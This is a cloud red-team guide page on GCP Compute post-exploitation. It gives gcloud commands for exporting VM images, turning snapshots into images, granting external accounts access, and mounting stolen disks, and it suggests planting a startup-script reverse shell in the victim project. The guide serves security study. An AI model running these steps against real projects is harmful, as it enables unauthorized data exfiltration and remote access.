GCP - Compute Post Exploitation

Reading time: 4 minutes

Compute

For more information about Compute and VPC (Networking) check:

GCP - Compute Enum

Export & Inspect Images locally

This would allow an attacker to access the data contained inside already existing images or create new images of running VMs and access their data without having access to the running VM.

It's possible to export a VM image to a bucket and then download it and mount it locally with the command:

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

Fore performing this action the attacker might need privileges over the storage bucket and for sure privileges over cloudbuild as it's the service which is going to be asked to perform the export
Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.
The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com needs:

• roles/iam.serviceAccountTokenCreator
• roles/compute.admin
• roles/iam.serviceAccountUser

And the SA <project-id>-compute@developer.gserviceaccount.com needs:

• oles/compute.storageAdmin
• roles/storage.objectAdmin

Export & Inspect Snapshots & Disks locally

It's not possible to directly export snapshots and disks, but it's possible to transform a snapshot in a disk, a disk in an image and following the previous section, export that image to inspect it locally

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Inspect an Image creating a VM

With the goal of accessing the data stored in an image or inside a running VM from where an attacker has created an image, it possible to grant an external account access over the image:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
  --member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
  --role='roles/compute.imageUser'

and then create a new VM from it:

gcloud compute instances create [INSTANCE_NAME] \
  --project=[TARGET_PROJECT_ID] \
  --zone=[ZONE] \
  --image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

If you could not give your external account access over image, you could launch a VM using that image in the victims project and make the metadata execute a reverse shell to access the image adding the param:

    --metadata startup-script='#! /bin/bash
        echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

With the goal of accessing the data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow th preivous steps.

Or you could grant an external account access over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
  --member='user:[USER_EMAIL]' \
  --role='roles/compute.storageAdmin'

Attach the disk to an instance:

gcloud compute instances attach-disk [INSTANCE_NAME] \
  --disk [DISK_NAME] \
  --zone [ZONE]

Mount the disk inside the VM:

1. SSH into the VM:

   gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
   

2. Identify the Disk: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as /dev/sdb, /dev/sdc, etc.

3. Format and Mount the Disk (if it's a new or raw disk):

   • Create a mount point:

     sudo mkdir -p /mnt/disks/[MOUNT_DIR]
     

   • Mount the disk:

     sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
     

If you cannot give access to a external project to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.